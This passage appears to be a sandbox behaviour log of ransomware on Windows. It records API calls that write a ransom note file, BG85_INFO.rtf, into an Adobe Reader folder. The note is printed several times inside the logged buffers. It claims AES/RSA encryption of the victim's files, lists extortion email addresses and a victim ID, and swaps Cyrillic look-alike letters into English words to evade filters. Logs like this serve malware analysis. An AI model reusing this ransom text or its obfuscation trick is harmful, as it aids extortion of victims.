c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.897] WriteFile (in: hFile=0x1e4, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.898] CloseHandle (hObject=0x1e4) returned 1 [0064.898] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\bg85_info.rtf")) returned 0xffffffff [0064.898] GetLastError () returned 0x2 [0064.898] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\SLV\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\slv\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, 